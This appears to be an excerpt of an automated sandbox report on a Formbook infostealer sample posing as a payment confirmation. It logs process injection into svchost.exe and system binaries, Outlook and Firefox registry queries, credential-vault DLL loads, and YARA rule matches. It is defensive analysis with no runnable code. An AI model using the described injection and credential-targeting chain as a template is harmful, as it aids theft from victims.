            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_0041170B3_2_0041170B
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00408FC23_2_00408FC2
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 3_2_00408FCB3_2_00408FCB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E897F64_2_61E897F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E200124_2_61E20012
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E603D34_2_61E603D3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E453DE4_2_61E453DE
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E2F3B74_2_61E2F3B7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E3F2D04_2_61E3F2D0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E432AA4_2_61E432AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E6D2884_2_61E6D288
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E244974_2_61E24497
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E627494_2_61E62749
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E1567E4_2_61E1567E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E288074_2_61E28807
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E438164_2_61E43816
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E4EB854_2_61E4EB85
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E6FACA4_2_61E6FACA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E1BA5A4_2_61E1BA5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E3CA3A4_2_61E3CA3A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E3DFCB4_2_61E3DFCB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E51FB54_2_61E51FB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E4FEAD4_2_61E4FEAD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008CE2A8 appears 60 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0093F970 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00913F92 appears 132 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0091373B appears 253 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008CDF5C appears 137 times
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: String function: 01307750 appears 42 times
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: String function: 012FF885 appears 68 times
            Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
            Source: Payment confirmation 20240911.exe, 00000000.00000003.349999678.0000000003740000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment confirmation 20240911.exe
            Source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000035BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment confirmation 20240911.exe
            Source: Payment confirmation 20240911.exe, 00000000.00000002.350637721.000000000078C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs Payment confirmation 20240911.exe
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: Payment confirmation 20240911.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@20/12
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132D712 GetLastError,FormatMessageW,0_2_0132D712
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131B8B0 AdjustTokenPrivileges,CloseHandle,0_2_0131B8B0
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0131BEC3
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132EB4B SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0132EB4B
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01326F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_01326F5B
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0133C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0133C604
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_012E31F2
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeFile created: C:\Users\user\AppData\Local\Temp\aut7C51.tmpJump to behavior
            Source: Payment confirmation 20240911.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: RMActivate_ssp.exe, 00000004.00000002.746250052.0000000061E90000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Payment confirmation 20240911.exeReversingLabs: Detection: 31%
            Source: Payment confirmation 20240911.exeVirustotal: Detection: 33%
            Source: unknownProcess created: C:\Users\user\Desktop\Payment confirmation 20240911.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Payment confirmation 20240911.exeStatic file information: File size 1211392 > 1048576
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Payment confirmation 20240911.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xONxwdydvq.exe, 00000003.00000002.745699004.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.379153081.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379175938.0000000000380000.00000004.00000020.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372791774.0000000000757000.00000004.00000001.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372875167.00000000003E0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Payment confirmation 20240911.exe, 00000000.00000003.349937356.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.386096763.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368106439.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368458108.0000000000720000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.386096763.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387256900.0000000001C80000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387592222.0000000001DE0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.0000000001F70000.00000040.00001000.00020000.00000000.sdmp
